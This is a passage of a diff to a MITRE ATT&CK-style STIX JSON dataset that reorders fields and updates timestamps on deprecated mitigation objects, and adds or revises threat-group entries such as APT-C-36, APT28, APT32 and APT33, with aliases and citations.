+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -184144,8 +211980,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.233Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--5391ece4-8866-415d-9b5e-8dc5944f612a",
@@ -184165,8 +212001,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:45:45.651Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22",
@@ -184186,8 +212022,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:46:32.010Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--8f6b5ca6-263a-4ea9-98f3-afd2a3cd8119",
@@ -184207,8 +212043,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:50:34.690Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ad7f983d-d5a8-4fce-a38c-b68eda61bf4e",
@@ -184228,8 +212064,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:59:46.032Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c861bcb1-946f-450d-ab75-d4e3c1103a56",
@@ -184249,8 +212085,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:00:12.285Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a766ce73-5583-48f3-b7c0-0bb43c6ef8c7",
@@ -184275,8 +212111,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:01:13.198Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--399d9038-b100-43ef-b28d-a5065106b935",
@@ -184301,8 +212137,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:01:33.997Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--94927849-03e3-4a07-8f4c-9ee21b626719",
@@ -184322,8 +212158,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:01:55.766Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -184348,8 +212184,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:02:27.102Z",
"created": "2019-04-24T17:02:25.107Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--dbf0186e-722d-4a0a-af6a-b3460f162f84",
@@ -184369,8 +212205,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:02:48.931Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--23bff3ce-021c-4e7a-9aee-60fd40bc7c6c",
@@ -184390,8 +212226,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:03:12.876Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--97d8eadb-0459-4c1d-bf1a-e053bd75df61",
@@ -184416,7 +212252,7 @@
},
{
"description": "OWASP. (2017, April 16). OWASP Top 10 2017 - The Ten Most Critical Web Application Security Risks. Retrieved February 12, 2019.",
- "url": "https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf",
+ "url": "https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/",
"source_name": "OWASP Top 10 2017"
}
],
@@ -184424,10 +212260,10 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"type": "course-of-action",
- "modified": "2019-07-25T12:04:31.644Z",
+ "modified": "2020-07-14T22:23:56.006Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -184452,8 +212288,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:06:06.231Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -184498,8 +212334,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.235Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--684feec3-f9ba-4049-9d8f-52d52f3e0e40",
@@ -184544,8 +212380,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.705Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c1676218-c16a-41c9-8f7a-023779916e39",
@@ -184590,8 +212426,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.266Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -184636,8 +212472,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.903Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d8787791-d22e-45bb-a9a8-251d8d0a1ff2",
@@ -184682,8 +212518,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.699Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--82d8e990-c901-4aed-8596-cc002e7eb307",
@@ -184728,8 +212564,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.239Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -184749,8 +212585,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:26:37.946Z",
"created": "2019-04-23T20:33:09.318Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f0a42cad-9b1f-44da-a672-718f18381018",
@@ -184795,8 +212631,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:26:58.596Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c7e49501-6021-414f-bfa1-94519d8ec314",
@@ -184826,8 +212662,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:27:19.577Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--160af6af-e733-4b6a-a04a-71c620ac0930",
@@ -184847,8 +212683,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:27:40.782Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -184908,8 +212744,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.703Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--5c167af7-c2cb-42c8-ae67-3fb275bf8488",
@@ -184954,8 +212790,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.250Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -184975,8 +212811,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:28:59.970Z",
"created": "2019-04-24T17:03:39.689Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--809b79cd-be78-4597-88d1-5496d1d9993a",
@@ -184996,8 +212832,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:29:22.784Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--797312d4-8a84-4daf-9c56-57da4133c322",
@@ -185017,8 +212853,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:30:35.417Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--e8d22ec6-2236-48de-954b-974d17492782",
@@ -185063,8 +212899,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.676Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a0d8db1d-a731-4428-8209-c07175f4b1fe",
@@ -185089,8 +212925,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:31:21.118Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -185108,7 +212944,7 @@
"description": "Perform regular software updates to mitigate exploitation risk.",
"id": "course-of-action--e5d930e9-775a-40ad-9bdb-b941d8dfe86b",
"type": "course-of-action",
- "modified": "2019-06-11T17:12:55.207Z",
+ "modified": "2020-07-07T12:42:39.005Z",
"created": "2019-06-11T17:12:55.207Z",
"x_mitre_version": "1.0"
},
@@ -185133,9 +212969,13 @@
"x_mitre_version": "1.1"
},
{
- "id": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
- "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
- "name": "User Account Management",
+ "created": "2019-06-06T16:50:58.767Z",
+ "modified": "2020-05-20T13:49:12.270Z",
+ "type": "course-of-action",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -185143,13 +212983,9 @@
"url": "https://attack.mitre.org/mitigations/M1018"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2020-03-31T13:11:21.150Z",
- "created": "2019-06-06T16:50:58.767Z",
+ "name": "User Account Management",
+ "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+ "id": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
"x_mitre_version": "1.1"
},
{
@@ -185170,8 +213006,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:31:53.804Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--2a4f6c11-a4a7-4cb9-b0ef-6ae1bb3a718a",
@@ -185231,8 +213067,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:32:31.844Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d9f4b5fa-2a39-4bdf-b40a-ea998933cd6d",
@@ -185277,8 +213113,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.911Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -185296,7 +213132,7 @@
"description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
"id": "course-of-action--15437c6d-b998-4a36-be41-4ace3d54d266",
"type": "course-of-action",
- "modified": "2020-03-31T13:11:37.532Z",
+ "modified": "2020-07-14T22:22:06.356Z",
"created": "2019-06-06T16:47:30.700Z",
"x_mitre_version": "1.1"
},
@@ -185323,8 +213159,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:34:04.565Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--bcc91b8c-f104-4710-964e-1d5409666736",
@@ -185349,8 +213185,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:34:23.847Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--308855d1-078b-47ad-8d2a-8f9b2713ffb5",
@@ -185395,8 +213231,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.710Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--0bc3ce00-83bc-4a92-a042-79ffbc6af259",
@@ -185421,8 +213257,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:35:09.565Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025",
@@ -185447,8 +213283,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:46:19.274Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--313c8b20-4d49-40c1-9ac0-4c573aca28f3",
@@ -185483,8 +213319,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.244Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7708ac15-4beb-4863-a1a5-da2d63fb8a3c",
@@ -185504,8 +213340,8 @@
"type": "course-of-action",
"modified": "2019-07-25T12:36:43.778Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -185518,6 +213354,42 @@
"modified": "2017-06-01T00:00:00.000Z",
"created": "2017-06-01T00:00:00.000Z"
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0099",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0099"
+ },
+ {
+ "source_name": "Blind Eagle",
+ "description": "(Citation: QiAnXin APT-C-36 Feb2019)"
+ },
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "name": "APT-C-36",
+ "type": "intrusion-set",
+ "id": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "aliases": [
+ "APT-C-36",
+ "Blind Eagle"
+ ],
+ "modified": "2020-05-07T22:53:31.155Z",
+ "created": "2020-05-05T18:53:08.166Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Jose Luis S\u00e1nchez Martinez"
+ ]
+ },
{
"type": "intrusion-set",
"id": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662",
@@ -185789,9 +213661,9 @@
"description": "(Citation: Dark Reading Codoso Feb 2015)"
},
{
- "source_name": "FireEye APT19",
+ "url": "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html",
"description": "Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html"
+ "source_name": "FireEye APT19"
},
{
"url": "https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/",
@@ -185804,9 +213676,9 @@
"url": "https://www.fireeye.com/current-threats/apt-groups.html#apt19"
},
{
- "source_name": "Unit 42 C0d0so0 Jan 2016",
+ "url": "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/",
"description": "Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/"
+ "source_name": "Unit 42 C0d0so0 Jan 2016"
},
{
"source_name": "Dark Reading Codoso Feb 2015",
@@ -185821,15 +213693,31 @@
"Codoso Team",
"Sunshop Group"
],
- "modified": "2020-03-30T18:47:06.466Z",
+ "modified": "2020-06-20T22:48:29.397Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.3",
"x_mitre_contributors": [
"FS-ISAC",
"Darren Spruell"
- ]
+ ],
+ "x_mitre_version": "1.3"
},
{
+ "created": "2017-05-31T21:31:48.664Z",
+ "modified": "2020-03-30T15:28:00.965Z",
+ "aliases": [
+ "APT28",
+ "SNAKEMACKEREL",
+ "Swallowtail",
+ "Group 74",
+ "Sednit",
+ "Sofacy",
+ "Pawn Storm",
+ "Fancy Bear",
+ "STRONTIUM",
+ "Tsar Team",
+ "Threat Group-4127",
+ "TG-4127"
+ ],
"type": "intrusion-set",
"id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -185978,28 +213866,12 @@
"source_name": "Microsoft STRONTIUM Aug 2019"
}
],
- "aliases": [
- "APT28",
- "SNAKEMACKEREL",
- "Swallowtail",
- "Group 74",
- "Sednit",
- "Sofacy",
- "Pawn Storm",
- "Fancy Bear",
- "STRONTIUM",
- "Tsar Team",
- "Threat Group-4127",
- "TG-4127"
- ],
- "modified": "2020-03-30T15:28:00.965Z",
- "created": "2017-05-31T21:31:48.664Z",
- "x_mitre_version": "2.3",
"x_mitre_contributors": [
"Drew Church, Splunk",
"Emily Ratliff, IBM",
"Richard Gold, Digital Shadows"
- ]
+ ],
+ "x_mitre_version": "2.3"
},
{
"type": "intrusion-set",
@@ -186198,6 +214070,14 @@
"x_mitre_version": "1.0"
},
{
+ "type": "intrusion-set",
+ "id": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "APT32",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -186221,48 +214101,47 @@
"description": "(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)"
},
{
- "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
+ "source_name": "FireEye APT32 May 2017",
"description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.",
- "source_name": "FireEye APT32 May 2017"
+ "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
},
{
- "url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/",
+ "source_name": "Volexity OceanLotus Nov 2017",
"description": "Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.",
- "source_name": "Volexity OceanLotus Nov 2017"
+ "url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/"
},
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
- "source_name": "Cybereason Oceanlotus May 2017",
+ "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
"url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
- "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018."
+ "source_name": "Cybereason Oceanlotus May 2017"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based. (Citation: FireEye APT32 May 2017) (Citation: Volexity OceanLotus Nov 2017) (Citation: ESET OceanLotus)",
- "name": "APT32",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
- "type": "intrusion-set",
"aliases": [
"APT32",
"SeaLotus",
"OceanLotus",
"APT-C-00"
],
- "modified": "2020-03-30T20:26:08.527Z",
+ "modified": "2020-06-29T21:45:34.984Z",
"created": "2017-12-14T16:46:06.044Z",
"x_mitre_contributors": [
"Romain Dumont, ESET"
],
- "x_mitre_version": "2.2"
+ "x_mitre_version": "2.3"
},
{
+ "created": "2018-04-18T17:59:24.739Z",
+ "modified": "2020-07-01T15:48:20.759Z",
+ "aliases": [
+ "APT33",
+ "HOLMIUM",
+ "Elfin"
+ ],
"type": "intrusion-set",
"id": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -186281,19 +214160,28 @@
"source_name": "APT33",
"description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)"
},
+ {
+ "source_name": "HOLMIUM",
+ "description": "(Citation: Microsoft Holmium June 2020)"
+ },
{
"source_name": "Elfin",
"description": "(Citation: Symantec Elfin Mar 2019)"
},
{
- "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "source_name": "FireEye APT33 Sept 2017",
"description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.",
- "source_name": "FireEye APT33 Sept 2017"
+ "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
},
{
- "url": "https://www.brighttalk.com/webcast/10703/275683",
+ "source_name": "FireEye APT33 Webinar Sept 2017",
"description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.",
- "source_name": "FireEye APT33 Webinar Sept 2017"
+ "url": "https://www.brighttalk.com/webcast/10703/275683"
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
},
{
"source_name": "Symantec Elfin Mar 2019",
@@ -186301,12 +214189,6 @@
"description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019."
}
],
- "aliases": [
- "APT33",
- "Elfin"
- ],
- "modified": "2020-03-30T20:36:41.050Z",
- "created": "2018-04-18T17:59:24.739Z",
"x_mitre_version": "1.3"
},
{
@@ -186352,19 +214234,19 @@
"description": "(Citation: FireEye APT37 Feb 2018)"
},
{
- "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
+ "source_name": "FireEye APT37 Feb 2018",
"description": "FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.",
- "source_name": "FireEye APT37 Feb 2018"
+ "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
},
{
- "source_name": "Securelist ScarCruft Jun 2016",
+ "url": "https://securelist.com/operation-daybreak/75100/",
"description": "Raiu, C., and Ivanov, A. (2016, June 17). Operation Daybreak. Retrieved February 15, 2018.",
- "url": "https://securelist.com/operation-daybreak/75100/"
+ "source_name": "Securelist ScarCruft Jun 2016"
},
{
- "source_name": "Talos Group123",
+ "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
"description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.",
- "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
+ "source_name": "Talos Group123"
},
{
"url": "https://www.us-cert.gov/ncas/alerts/TA17-164A",
@@ -186397,12 +214279,12 @@
"Group123",
"TEMP.Reaper"
],
- "modified": "2020-03-30T18:49:39.063Z",
+ "modified": "2020-06-23T19:36:24.680Z",
"created": "2018-04-18T17:59:24.739Z",
+ "x_mitre_version": "1.4",
"x_mitre_contributors": [
"Valerii Marchuk, Cybersecurity Help s.r.o."
- ],
- "x_mitre_version": "1.4"
+ ]
},
{
